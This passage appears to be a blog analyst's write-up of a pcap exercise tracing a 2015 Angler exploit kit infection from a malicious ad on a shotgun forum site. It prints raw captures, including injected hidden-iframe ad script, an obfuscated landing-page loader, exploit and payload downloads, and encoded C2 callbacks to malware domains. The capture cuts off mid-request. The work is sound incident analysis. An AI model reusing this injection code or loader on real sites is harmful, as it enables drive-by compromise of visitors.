Lastly, since the malicious files were encrypted, I was not able to run them on my test VM. But I do have them along with all the other artifacts from my investigation located on my GitHub page found here<\/a>.<\/p>\n Basic Questions to Answer About Exercise: – Date and time of the activity. – The infected computer’s IP address. – The infected computer’s MAC address. – The infected computer’s host name. – Domains and IP addresses of any infection traffic with VT detection ratio. – DNS requests noted during the investigation: – Information about malware found on the infected host. – The root cause (what is the likely cause of the infection noted in the pcap). Notes about investigation: Once the connection is made from ‘solution[.]babyboomershopping[.]org’ I see that there is another redirect made to the site ‘neuhaus-hourakus[.]avelinoortiz[.]com\/’:<\/p>\n Once the connection has been made to ‘neuhaus-hourakus[.]avelinoortiz[.]com,’ it looks like it lands the user to an Angler EK landing page since it has that tell-tale page of quotes and scripts spread throughout:<\/p>\n From here I can see a POST back to the site – most likely passing stats about the system to craft the correct exploit:<\/p>\n And here is the malicious Flash file:<\/p>\n And another POST to the server:<\/p>\n And here is the site delivering the malicious binary files to the user’s system:<\/p>\n – Once the files have been downloaded from the above connection and installed, we see the malware trying to connect to two different IP addresses (52.22.18.194 \/ 52.21.140.191) on port 843. One thing that we can see is that the connection to these IP addresses are blocked since we only see the SYN packet being sent and no response from the other end:<\/p>\n Once again I am reminded of why it is a good idea to block any outbound connections except for well known ports (80\/443\/465\/995\/etc…) and having the logs for any\/all of that traffic. Granted one then needs to be able to ingest those logs and make sense of them as well. And don’t for get about your exceptions and having an exception process! <\/p>\n And now for the call-backs from the malware that was deposited on the system:<\/p>\n Interestingly enough, we can see a couple of POST requests being made to the server, but the response made from the server has the CONTENT-TYPE of “application\/octet-stream.” Since this is the response from the server, I do not believe that these are binary files at this time:<\/p>\n We then see the last POST to a different server this time:<\/p>\n One thing to mention as well, there were a fair good amount of DNS calls made that looked pretty abnormal. Please note that Chrome will do DNS pre-fetching which could cause some odd looking domains to be looked up as well (http:\/\/groups.google.com\/a\/chromium.org\/forum\/#!topic\/chromium-discuss\/F70-k_PGhEg). Here is a list of FQDNs that looked odd to me from the PCAP:<\/p>\n Results from Snort via Security Onion (ET rules): VirusTotal links for links and files found: File Name: neuhaus-literature.disco.exe File Name: neuhaus-yes.wbxml.exe So this one has a great comical backstory – how the user (ironically from the SOC) Tom brought his personal laptop in and managed to get his system infected while looking for a shotgun to go hunting with. Outside of making me and one of my co-workers laugh at the scenario (and then another one asking if this could be based on a real event – lol), there is one thing that I learned from this and it was from reading the answers. Brad explains how he went about finding the start of the infection chain from working backwards using…<\/p>\n
\n=========================================<\/p>\n
\n> First Packet: 2015-11-24 10:13:42 \/ Last Packet: 2015-11-24 10:22:23 \/ Elapsed Time: 08:41<\/p>\n
\n> 10.1.25.119<\/p>\n
\n> a4:1f:72:a6:9c:1b<\/p>\n
\n> Turkey-Tom<\/p>\n
\n> 52.22.18.194:843 | 0 \/ 55
\n> 52.21.140.191:843 | 0 \/ 56
\n> 64.34.173.208 | www.showtgunworld.com | 1 \/ 66
\n> 162.216.4.20 | neuhaus-hourakus.avelinoortiz.com | 2 \/ 66
\n> 166.78.145.90 | rnhbhnlmpvvdt.com | 8 \/ 66
\n> 151.80.126.226 | chin.truffleman.co.uk | 1 \/ 66
\n> 95.211.205.229 | ncqauqvqqhhzpc.com | 1 \/ 66<\/p>\n
\n> 11981 176.540744 10.1.25.119 63767 8.8.4.4 53 DNS Standard query 0x2749 A jtikbwiyllxnyi61.com
\n> 11983 176.819935 8.8.4.4 53 10.1.25.119 63767 DNS Standard query response 0x2749 No such name
\n> 11984 176.821924 10.1.25.119 60109 8.8.4.4 53 DNS Standard query 0xc23c A ghgmtcrluvghlwc91.com
\n> 11988 176.915258 8.8.4.4 53 10.1.25.119 60109 DNS Standard query response 0xc23c A 127.0.1.1
\n> 11989 176.926720 10.1.25.119 58168 8.8.4.4 53 DNS Standard query 0x5cc3 A ghgmtcrluvghlwc91.com
\n> 11990 177.005193 8.8.4.4 53 10.1.25.119 58168 DNS Standard query response 0x5cc3 A 127.0.1.1
\n> 11997 178.041367 10.1.25.119 57199 8.8.4.4 53 DNS Standard query 0x043c A qidxwsfqblej.com
\n> 11998 178.171919 8.8.4.4 53 10.1.25.119 57199 DNS Standard query response 0x043c No such name
\n> 11999 178.173503 10.1.25.119 58882 8.8.4.4 53 DNS Standard query 0xdad5 A lnhxwmhoyjxqmtgn9u.com
\n> 12000 178.254598 8.8.4.4 53 10.1.25.119 58882 DNS Standard query response 0xdad5 A 127.0.1.1
\n> 12001 178.268719 10.1.25.119 52742 8.8.4.4 53 DNS Standard query 0x1cf7 A lnhxwmhoyjxqmtgn9u.com
\n> 12002 178.348164 8.8.4.4 53 10.1.25.119 52742 DNS Standard query response 0x1cf7 A 127.0.1.1
\n> 12040 179.351621 10.1.25.119 53261 8.8.4.4 53 DNS Standard query 0xf345 A hsgxnjpdzifkjl4r.com
\n> 12068 179.449632 8.8.4.4 53 10.1.25.119 53261 DNS Standard query response 0xf345 No such name
\n> 12073 179.452374 10.1.25.119 62977 8.8.4.4 53 DNS Standard query 0x57eb A xwhrskktvevezz0.com
\n> 12112 179.540378 8.8.4.4 53 10.1.25.119 62977 DNS Standard query response 0x57eb No such name
\n> 12113 179.542265 10.1.25.119 50010 8.8.4.4 53 DNS Standard query 0x2997 A rnhbhnlmpvvdt.com
\n> 12158 179.651092 8.8.4.4 53 10.1.25.119 50010 DNS Standard query response 0x2997 A 166.78.145.90
\n> 12163 179.663157 10.1.25.119 50005 8.8.4.4 53 DNS Standard query 0xb4c8 A rnhbhnlmpvvdt.com
\n> 12194 179.748103 8.8.4.4 53 10.1.25.119 50005 DNS Standard query response 0xb4c8 A 166.78.145.90
\n> 12303 179.968038 10.1.25.119 61287 8.8.4.4 53 DNS Standard query 0xb54b A qtllebdadvitdim.com
\n> 12334 180.059365 8.8.4.4 53 10.1.25.119 61287 DNS Standard query response 0xb54b No such name
\n> 12335 180.060984 10.1.25.119 56286 8.8.4.4 53 DNS Standard query 0x9da2 A wyvpeiyaxycznuia6.com
\n> 12372 180.155660 8.8.4.4 53 10.1.25.119 56286 DNS Standard query response 0x9da2 No such name
\n> 12373 180.157299 10.1.25.119 49396 8.8.4.4 53 DNS Standard query 0xb029 A ncqauqvqqhhzpc.com
\n> 12411 180.238941 8.8.4.4 53 10.1.25.119 49396 DNS Standard query response 0xb029 A 95.211.205.229
\n> 12415 180.252274 10.1.25.119 51862 8.8.4.4 53 DNS Standard query 0x7ebc A ncqauqvqqhhzpc.com
\n> 12453 180.348244 8.8.4.4 53 10.1.25.119 51862 DNS Standard query response 0x7ebc A 95.211.205.229
\n> 13636 193.071344 10.1.25.119 55508 8.8.4.4 53 DNS Standard query 0x8551 A chin.truffleman.co.uk
\n> 13637 193.272985 8.8.4.4 53 10.1.25.119 55508 DNS Standard query response 0x8551 A 151.80.126.226<\/p>\n
\n> The malware associated with this infection looks to be related to Angler EK starting with a Flash exploit.<\/p>\n
\n> The root cause for this infection is from a compromised website (shotgunworld[.]com) with a malicious ad that redirects the end-user to the Angler EK page.<\/p>\n
\n==========================
\nLooks like the host “hxxp:\/\/www[.]shotgunworld[.]com” is the initial site that is compromised via what looks to be a malicious Javascript ad off the shotgunworld site (mind you that this is a hidden iframe from what I can tell):<\/p>\n\r\n\tGET \/adserver\/www\/delivery\/ajs.php?zoneid=1&withtext=1&cb=99806861739&charset=utf-8&loc=http%3A\/\/www.shotgunworld.com\/&referer=http%3A\/\/www.google.com\/url%3Fsa%3Dt%26rct%3Dj%26q%3D%26esrc%3Ds%26source%3Dweb%26cd%3D1%26sqi%3D2%26ved%3D0ahUKEwiKnu-0uqnJAhUIWD4KHal9DUcQFggcMAA%26url%3Dhttp%253A%252F%252Fwww.shotgunworld.com%252F%26usg%3DAFQjCNEURWbI-lwIgSRkGqiR9ALrodRMUw%26bvm%3Dbv.108194040%2Cd.dmo HTTP\/1.1\r\n\tAccept: application\/javascript, *\/*;q=0.8\r\n\tReferer: http:\/\/www.shotgunworld.com\/\r\n\tAccept-Language: en-US\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\tAccept-Encoding: gzip, deflate\r\n\tHost: www.shotgunworld.com\r\n\tConnection: Keep-Alive\r\n\tCookie: OAID=380cc1bbe19b8e1255013f1f986ddebe; OAVARS[abf85608]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22oadest%22%3Bs%3A26%3A%22http%3A%2F%2Fwww.gueriniusa.com%2F%22%3B%7D; __utma=249653828.1397841079.1448381776.1448381776.1448381776.1; __utmb=249653828.3.10.1448381776; __utmc=249653828; __utmz=249653828.1448381776.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __utmt_UA-44006917-3=1; __utmt_UA-24085258-3=1; __utmt_UA-17979443-1=1\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tDate: Tue, 24 Nov 2015 16:16:24 GMT\r\n\tServer: Apache\/2.2.3 (CentOS)\r\n\tX-Powered-By: PHP\/5.1.6\r\n\tPragma: no-cache\r\n\tCache-Control: private, max-age=0, no-cache\r\n\tExpires: Mon, 26 Jul 1997 05:00:00 GMT\r\n\tP3P: CP="CUR ADM OUR NOR STA NID"\r\n\tSet-Cookie: OAID=380cc1bbe19b8e1255013f1f986ddebe; expires=Wed, 23-Nov-2016 16:16:24 GMT; path=\/\r\n\tContent-Length: 1479\r\n\tConnection: close\r\n\tContent-Type: text\/javascript; charset=utf-8\r\n\r\n\tvar OX_7f561e63 = '';\r\n\tOX_7f561e63 += "<"+"iframe style=\\"position:absolute;left:-3060px;top:-4000px;width:360px;height:357px;\\" src=\\"http:\/\/solution.babyboomershopping.org\/respondents\/header.js\\"><"+"\/iframe><"+"a href=\\'http:\/\/www.shotgunworld.com\/adserver\/www\/delivery\/ck.php?oaparams=2__bannerid=3__zoneid=1__cb=0d1dc4c39c__oadest=http%3A%2F%2Fwww.americhoke.com\\' target=\\'_blank\\'><"+"img src=\\'http:\/\/www.shotgunworld.com\/AmerichokeBanner.gif\\' width=\\'468\\' height=\\'60\\' alt=\\'Americhoke\\' title=\\'Americhoke\\' border=\\'0\\' \/><"+"\/a><"+"br \/><"+"a href=\\'http:\/\/www.shotgunworld.com\/adserver\/www\/delivery\/ck.php?oaparams=2__bannerid=3__zoneid=1__cb=0d1dc4c39c__oadest=http%3A%2F%2Fwww.americhoke.com\\' target=\\'_blank\\'>Choke tube installation barrel porting adjustable combs<"+"\/a><"+"div id=\\'beacon_0d1dc4c39c\\' style=\\'position: absolute; left: 0px; top: 0px; visibility: hidden;\\'><"+"img src=\\'http:\/\/www.shotgunworld.com\/adserver\/www\/delivery\/lg.php?bannerid=3&campaignid=3&zoneid=1&loc=http%3A%2F%2Fwww.shotgunworld.com%2F&referer=http%3A%2F%2Fwww.google.com%2Furl%3Fsa%3Dt%26rct%3Dj%26q%3D%26esrc%3Ds%26source%3Dweb%26cd%3D1%26sqi%3D2%26ved%3D0ahUKEwiKnu-0uqnJAhUIWD4KHal9DUcQFggcMAA%26url%3Dhttp%253A%252F%252Fwww.shotgunworld.com%252F%26usg%3DAFQjCNEURWbI-lwIgSRkGqiR9ALrodRMUw%26bvm%3Dbv.108194040%2Cd.dmo&cb=0d1dc4c39c\\' width=\\'0\\' height=\\'0\\' alt=\\'\\' style=\\'width: 0px; height: 0px;\\' \/><"+"\/div>\\n";\r\n\tdocument.write(OX_7f561e63);\r\n\t<\/pre>\n
\r\n\tGET \/respondents\/header.js HTTP\/1.1\r\n\tAccept: text\/html, application\/xhtml+xml, *\/*\r\n\tReferer: http:\/\/www.shotgunworld.com\/\r\n\tAccept-Language: en-US\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\tAccept-Encoding: gzip, deflate\r\n\tHost: solution.babyboomershopping.org\r\n\tConnection: Keep-Alive\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\r\n\tDate: Tue, 24 Nov 2015 16:18:32 GMT\r\n\tContent-Type: text\/html; charset=utf-8\r\n\tTransfer-Encoding: chunked\r\n\tConnection: keep-alive\r\n\tX-Powered-By: PHP\/5.3.3\r\n\r\n\tc0\r\n\t<iframe style="position:absolute;left:-3311px;top:-3861px;width:309px;height:326px;" src="http:\/\/neuhaus-hourakus.avelinoortiz.com\/forums\/viewforum.php?f=15&sid=0l.h8f0o304g67j7zl29"><\/iframe>\r\n\t0\r\n\t<\/pre>\n
\r\n\tGET \/forums\/viewforum.php?f=15&sid=0l.h8f0o304g67j7zl29 HTTP\/1.1\r\n\tAccept: text\/html, application\/xhtml+xml, *\/*\r\n\tReferer: http:\/\/solution.babyboomershopping.org\/respondents\/header.js\r\n\tAccept-Language: en-US\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\tAccept-Encoding: gzip, deflate\r\n\tHost: neuhaus-hourakus.avelinoortiz.com\r\n\tConnection: Keep-Alive\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.8.0\r\n\tDate: Tue, 24 Nov 2015 17:13:18 GMT\r\n\tContent-Type: text\/html\r\n\tContent-Length: 94921\r\n\tConnection: keep-alive\r\n\r\n\t<!DOCTYPE html>\r\n\t<html>\r\n\t<head>\r\n\r\n\t<title>\r\n\tyou something that might you,\r\n\t<\/title>\r\n\t<\/head>\r\n\t<body>\r\n\t<strike>\r\n\t "How horrid all this tumbling about and I believe I have borne with calmness, and she dared not follow her to accept your invitation here?"-- "It was my comfort.\r\n\t<\/strike>\r\n\t<ol>\r\n\t Yet, though smiling to see them once;\r\n\t <u>\r\n\t <em>\r\n\t " This however was not very likely." "Well, and whose possessions he was monstrous happy, and rather better pasturage for their ease and enjoyment, and only prevented from being her relations too made it appear that she had hoped to be to\r\n\t <\/em>\r\n\t might at present confess to her own composure of voice, under which was exactly the reverse of her mind might be found when the life of sin. Her legal allowance was not in the and\r\n\t <\/u>\r\n\t <ol>\r\n\t A man must pay for his intrusion on that head. The would probably have passed without suspicion, had he married you, he have\r\n\t <i>\r\n\t s delicate, enquiries\r\n\t <\/i>\r\n\t <\/ol>\r\n\t <form>\r\n\t Their opportunity of introducing it, and on misters They's suggestion; and humoured\r\n\t <\/form>\r\n\t<\/ol>\r\n\t<div style=" width:8px; height:18px;"><p ui ="I3Zj-#qm1pQOPHiOOprmDg">wd['p]i' mO wwhno'V=u ncia'x( nio1t;fWxtv{ard ) wetnaT = e)e; aDa et arDvt(pmtlu; op et {D =dnlmtawn Dt}=hw)( e a e ; t mpadl e eatiDe( -t;T }fo escnnu< x)it btas(iDwo{ n)teaaw dOpmV];'ni = ['hw''wo[vg'ro ;= u]dWw't e = awaodesilvfrt ;nWvbaM=.niLj cwufO jwv.OWasow cM udbwfLj=.ofvWjn 1uaLbiOdwcMfdiowfu LjWOMv=.wnabct=; i2s nuoff} tcnruy( dt'[w o{e)Qeniw]F =t}tnueu rr x' ;f oxTxet {l()tceinni e sut,arr = vlrr""al=in.(y..ta\/mae hc( )fo i\/0 av ()rg; r= arag ;l.ty;ri<neh{) rs=+rttl uie+ + Sr.omhenraCr(aiCgfdop(nara e\/)i[3ysrIt,]2 rte)tlnrsu2e;}r ua r cd mu Loj;M}v =ce.tEeyn"(neImeltgBtdcu") bep1c"GW,aM= pc 2=iG"= "dcln",G ;1+1"dhnGoi ;c" Cc uftuTe(, r)rv nsxr{ ae w m; o.eg axI=n)(x a= ;clx .x nrodrs=st);MaecGLj"cT x("[+]c(x;r+;0ern 1)G2ut nfctou}fpx en i urT_) {x'fa6ur7T( ,r(e4uk2u606u65k7374325o4246q0oe676c6462766iagg3gc 0,f5i+22327'o x;Treark37'7( u) 6466u3kouu477065252464e0q4ci62 '6o5666627aor,);}t nufi + f cnoVu(){nTgifia x re( vurseAitxenengaro..tdS'IE)1f &== O'(M- &aito.ranoppsanrvgeVixdOf'ni)'irtT.(need\/1 ) n= }te;r {=-ru ! !wn_iD_woId if(_.ELOBA_LVOCNOECERTOOS__NLIE'MRB||_ MNAD( _TEOOSOWS_OCL_OLSRSNENFC'idF))w onA EUniwDeatb; tees a{ast)(s(r);r;u ut eQ eynr}v x,xKaep= a0v rk' sIyeVrtsKl+ u'rik.' a'o +'gyJ.Pdire baulnrsipA v= 'ixpatac, 1 x2= x'10x' 0,+ . x= 04,0_ +_ x 3.'5t;ry{=1wevk . ' xnvteXbxA ;ce1j Oci(t)wd.seei }t ;=w2nour (ce){=alavk c th xfr y e wxvnks{;t= eeiXOj2c} tc)eAbtvx(;ht(e cafk ={ )acxv t;ry{=swevk l e xnvteXbxA ;ce3j Oci(t)cah()x f { }ectvk= ewidelrt.w=oans;1s } ve{ fix u};}k()attaa sQt(ess beD;)e)y; e ev ru}turr(;n a tha[rc4 a tad p ='886oaoii63447666654co86a4g8u26s6267667aau626626,'343323323a4qc7e2o'q46457 6545ac426a0ue67686572676uo0842a6os6686757554uuc666sas627a2662576gu6u34ce4' 3a'333223c,eq624cce75a4657475oqa4208o2o56u7665766u6207a8u8s64u66575466s6c2sau6436g2756762a66630i,uu43i 32323'c'626oai4875o7576666c4o244ueaa62g77766640a0842886u6686676727iio67as6ss26i7666757s8ag2u66a23243362762u2',502o0a6646736' 62oo6502ooa66467667562o0658u6o246u5666727ooo06i6i0s67266767668u6o6a8u6267a67775750sci6aom8a66u2676676usua2644g832u327362360f;or( ;0ra=v' ] i p<atdeihtatna h l.g)+ xr( ht_epu;T+ifpaia],sra ;Qtyed t[eu)ahta=;af un p tdll}otn T)nv eu ruxci(A{2 ="2r074o75a k6m6646mi2ao5406267776o46270amm027477466766i k= 46,5qs6i2"" 387277a7246 =,"00c6i4k 768677450s684"aisa6276a7626 ,870i64a6i7" "56645087ouk81=26276a7626 ,870i64a6i7" "55"44k45,ak02=a4 4 6554 2o652i34="8545 ="g"o67o650 ,k66aga2s8uo436o2666672o626304 u5" ,="23236k 66633662os2o4o8qc86623u2332"ec3c4u664a33hadaa' 26 =4 ,tpt [q2e74a8o67746666767ias278i20e74q6226466qoa45oqq2g76466667662a8s6oo48432u22762636u,4 'qe0476266343'7o2i478a2a872667666740sqq62o4io56e67662472ais6s60aa63023776630sua264igm44u5273624862q4eaqio6 ,6'44444"2426a4ae027i7776676868s6iq02u67a6442677goo86q4sig7626666752aa6u34u0a" 34"3622230,o27e24q87647746666ai0642sqag7684766722iauo6i840a66o6577666q2ga6auus0336322267244",4q222a67o7636" 6e48i6a6s4i640726777628ga70o8qa76u5626477iosi760ssg73063636620a6u34u6ai4484462225ime24a,4qs65'6 4"4478aq06i6o8i6645766245u8s26ia88645q6677665oqcs6ieouu26s62666668ou4266i6,'303323323i8486asq'662866 65740iou58is4a76867766562i8o6q68qq67i67655576aag66me6866i2646666ssuo2646oi32u326362360,8 k +ic3k +323' 3'006cuess62467263250ieu76048676e6562677um826iu 8,57s+67667'6k k3+sk '3'3 2+2c0k,2 'ks2 33k++5 +ek 5,k30' + 23 '+k +003i k4 +6k2+3'33 , '+340 3,632+3k3 '0k k3+0k233'3 2+342c27kmoo86642756676ssuo2644oo44u426362442 k2+ o343k' 4 ',+ 353o73+3 ,c3kg0g24 '6k+3 3256432'k+ 03333c'+27k ,6 ko ggk +3 2323 7o030s38+'s25'3 +6+3 3k ,gkgc 2k33a235 3gs2o0+s'2037+'k6 k3 + 23kg,c + 23s32733g23gs'02ao536+, 2 '3' ++ ck k3k 3202333'co5g42sasg73 6k2+++c34k k, 0' 0+k, s 02kk 253'+ 423s3' + k+k +0'e,52+0 '4ikk+30'3 34 30 k+ 43,30+ 406k 2' 3+'k6 k3+ 24k2,0 +004322c'm66o75 33372kos2s8u4436o2676662o64442o u+ 'ok42444, 2+0 '44kg73053 34 32o c+k, g 02kk 363'+ 4330333 'co5g6+2'4g73 6k2+++234k k, 0'0s2s0g8 '7o3533233gck,2 k3204'k++6 + 323s3532+ g7coa0s0g3'2 +k'6a3 034k ,k +2s032ocsk+3g'725323g k+ 43,2a+ 206k 2' 332457'36kg3 gso0sc3++2 k12 s2 +3 ,4k 3'80s5og 0,63g+33723'ck k4 3k3s' a+ 12+23253o73+2 ,c3kg0gs0 '6k+41+a2033'2 k 32so27ggksk 'c632335+ ,4 1 2 2023s'2++ka3375g33632k ',csg4ok+ 2k +'s+o53032 4240cg' k g4k ,+67+332k 2 0327 3g03gs26+'o536+, 23'' + ck k4k+0s5og 6,63g+33723'ck k4 ;kro6k + 22+] f ai <(ta ; 0 =vr ip.tleg+dx ;hithnaa+ )pef(aar,]dh[tTpu_taiattaaks =)e2s beD ; k=40==3244k k 1k3k =k6=p = 5 4k =tda tTxlu}na=ha;l )V; T)uWxeu;rrxe((A 4(00; i a)t1 <\/p>\r\n\t<form>\r\n\t<\/pre>\n![\"Angler](\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/12\/Img1.png\")
<\/a><\/p>\n\r\n\tPOST \/forums\/fiscal.hypetemplate?machine=0erT2JL5&idea=bAtrR&oh=&other=4vm3vmKv&woman=&shoot=gN9eEjH&process=f2r-BDMy&minute=&larger=kST8&difficult=WgR0Lms5 HTTP\/1.1\r\n\tAccept: *\/*\r\n\tContent-Type: text\/html; charset=utf-8\r\n\tReferer: http:\/\/neuhaus-hourakus.avelinoortiz.com\/forums\/viewforum.php?f=15&sid=0l.h8f0o304g67j7zl29\r\n\tAccept-Language: en-US\r\n\tAccept-Encoding: gzip, deflate\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\tHost: neuhaus-hourakus.avelinoortiz.com\r\n\tContent-Length: 188\r\n\tConnection: Keep-Alive\r\n\tCache-Control: no-cache\r\n\r\n\tcEZQAoBD1JC2osm3oFWTx6csMwLYXl+8RNz2OEKzknDTEKBSkw4\/mlx1gN\/345+\/pYTRuM5b\/246rNtClafKXD4ry38xe+d968qKHE\/Uo26gHKN5w+cOrO0lxSquj\/PE41q2pvRFKl4MIpPiN1uaJg7lsHGCoUcbJgmQPqmO2CBlBK+6zgUxNzg0MA==HTTP\/1.1 200 OK\r\n\tServer: nginx\/1.8.0\r\n\tDate: Tue, 24 Nov 2015 17:13:21 GMT\r\n\tContent-Type: text\/html\r\n\tContent-Length: 2384\r\n\tConnection: keep-alive\r\n\t<\/pre>\n
\r\n\tGET \/who.olp?save=&effect=VFv9cHM&you=LmzXy&picture=J0sYyqN&why=Dv0ZsHPosOWnZsEC9KJ9myAYKZSGT HTTP\/1.1\r\n\tAccept: *\/*\r\n\tAccept-Language: en-US\r\n\tReferer: http:\/\/neuhaus-hourakus.avelinoortiz.com\/forums\/viewforum.php?f=15&sid=0l.h8f0o304g67j7zl29\r\n\tx-flash-version: 19,0,0,207\r\n\tAccept-Encoding: gzip, deflate\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\tHost: neuhaus-hourakus.avelinoortiz.com\r\n\tConnection: Keep-Alive\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.8.0\r\n\tDate: Tue, 24 Nov 2015 17:13:22 GMT\r\n\tContent-Type: application\/x-shockwave-flash\r\n\tContent-Length: 75602\r\n\tConnection: keep-alive\r\n\r\n\tCWS\r\n\t#*..x....X.A.-\r\n\t.`............].....ACp.......w\r\n\t<\/pre>\n
\r\n\tPOST \/station.htm?again=&meet=wuzqI0&indeed=ypZLR7M&artist=&give=V_CvGhey&throw=&agreement=IWAIiztB-DCJSkcANq-qiph2Tah HTTP\/1.1\r\n\tAccept: *\/*\r\n\tAccept-Language: en-US\r\n\tReferer: http:\/\/neuhaus-hourakus.avelinoortiz.com\/who.olp?save=&effect=VFv9cHM&you=LmzXy&picture=J0sYyqN&why=Dv0ZsHPosOWnZsEC9KJ9myAYKZSGT\/[[DYNAMIC]\r\n\tx-flash-version: 19,0,0,207\r\n\tContent-Type: application\/x-www-form-urlencoded\r\n\tContent-Length: 196\r\n\tAccept-Encoding: gzip, deflate\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\tHost: neuhaus-hourakus.avelinoortiz.com\r\n\tConnection: Keep-Alive\r\n\tCache-Control: no-cache\r\n\r\n\txWRNDYEAqwYYwZ+peJN+So3iLI4\/QWR\/Z3+2aQkLn2RlsXwiqFOkyIbC1EWZuHWy1CwXdWfy+RfJh1cyIB9dOMCnPQoXtnlZlJOKDFFa85bHYiPt9q9iAnzuol+r63UCM1\/u1X2tFaTTCi1Xked2sZIbqZgt6wuUqzLOo+28kb0VXiGBYGgKMTksMCwwLDIwNw==HTTP\/1.1 200 OK\r\n\tServer: nginx\/1.8.0\r\n\tDate: Tue, 24 Nov 2015 17:13:26 GMT\r\n\tContent-Type: text\/html\r\n\tContent-Length: 5528\r\n\tConnection: keep-alive\r\n\t<\/pre>\n
\r\n\tGET \/literature.disco?audience=5Hr&trip=&election=txK1BgKFW&piece=aRLmxzX&normal=QGOT&understand=IWOBe&theory=so8bghs&discover=y47E5&tell=gSIQ&opportunity=ZWe&available=z HTTP\/1.1\r\n\tConnection: Keep-Alive\r\n\tAccept-Language: en-EN\r\n\tHost: neuhaus-hourakus.avelinoortiz.com\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.8.0\r\n\tDate: Tue, 24 Nov 2015 17:13:27 GMT\r\n\tContent-Type: application\/octet-stream\r\n\tContent-Length: 660972\r\n\tConnection: keep-alive\r\n\r\n\t-----\r\n\r\n\tGET \/yes.wbxml?unite=tXu9a5tJI&writer=J7y8dCR8F&describe=LzQOS9&for=¬e=C26Z8129ea&number=gcsXv8v&next=2unI-c8 HTTP\/1.1\r\n\tConnection: Keep-Alive\r\n\tAccept-Language: en-EN\r\n\tHost: neuhaus-hourakus.avelinoortiz.com\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.8.0\r\n\tDate: Tue, 24 Nov 2015 17:13:31 GMT\r\n\tContent-Type: application\/octet-stream\r\n\tContent-Length: 660972\r\n\tConnection: keep-alive\r\n\t<\/pre>\n
![\"Calls](\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/12\/Img2.png\")
<\/a><\/p>\n\r\n\tPOST \/include\/class_dm_event.php HTTP\/1.1\r\n\tConnection: Keep-Alive\r\n\tAccept: text\/html, application\/xhtml+xml, *\/*\r\n\tAccept-Language: en-US\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\tContent-Length: 263\r\n\tHost: rnhbhnlmpvvdt.com\r\n\r\n\togis0=uq+2TOoO36\/E3djA7FAY+qOQp6njry09&e=3HcbGddeYpGhIaiiCgDfit2Ka6pwf9z6U9SV&oaqe=Yr7rA6V7flvNGrf\/TshfqMLu0k6Bvq3tSPELVxAJkdC65dMe&oumkmm1=AmLf8T37jecJCNXacLepDLfFjH1UivyisxI5XCUaa2zjQ9meadjT8qdYm+fj&y=nrOdI1OUNk+70KCnnMpGUpEo7syABmmqvaGuLIvDIq2fMn41gBBeaYeVvW0=\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tDate: Tue, 24 Nov 2015 16:17:22 GMT\r\n\tServer: Apache\/2.2.20 (Ubuntu)\r\n\tX-Powered-By: PHP\/5.3.6-13ubuntu3.10\r\n\tX-Sinkhole: malware-sinkhole\r\n\tVary: Accept-Encoding\r\n\tContent-Length: 0\r\n\tKeep-Alive: timeout=1\r\n\tConnection: Keep-Alive\r\n\tContent-Type: text\/html\r\n\t<\/pre>\n
\r\n\tPOST \/include\/functions_newpost.php HTTP\/1.1\r\n\tConnection: Keep-Alive\r\n\tAccept: text\/html, application\/xhtml+xml, *\/*\r\n\tAccept-Language: en-US\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\tContent-Length: 277\r\n\tHost: ncqauqvqqhhzpc.com\r\n\r\n\tskgkmuq=2NKRclhTaaVcZfcfyHVUbhwfSld0Zju7&ewueoc=PswwbVqsNwbSgcqfG6gImfag&c=9JK1TVsiirO56TNCRSpf9LksdgM7&msmui=lBJh+rlt3H8VdbhdKI0280o2&y0=2qPbVGijLyJymtapuwZaLfNm7Kgmj5GtWigUmWGFfOqZ&k=\/A+hPvXyhmaoXk\/ARfa6o\/7Q7OhyrnOoFe3+Ocq\/dvhHHXzRR3e\/&mgacue=b\/1tQDvJswplB85kjSLVc4kED+uPy2U=\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\r\n\tDate: Tue, 24 Nov 2015 16:16:42 GMT\r\n\tContent-Type: application\/octet-stream\r\n\tContent-Length: 587\r\n\tConnection: keep-alive\r\n\tSet-Cookie: PHPSESSID=9b6f301d3b6400079694d341333b6959; expires=Wed, 25-Nov-2015 16:16:42 GMT\r\n\tSet-Cookie: walkover=6258; expires=Wed, 25-Nov-2015 16:16:42 GMT\r\n\tSet-Cookie: rigidity=7597; expires=Wed, 25-Nov-2015 16:16:42 GMT\r\n\tSet-Cookie: staunching=4382; expires=Wed, 25-Nov-2015 16:16:42 GMT\r\n\r\n\t-----\r\n\r\n\tPOST \/newthread.php HTTP\/1.1\r\n\tConnection: Keep-Alive\r\n\tAccept: text\/html, application\/xhtml+xml, *\/*\r\n\tAccept-Language: en-US\r\n\tReferer: http:\/\/lnhxwmhoyjxqmtgn9u.com\/search.php\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; 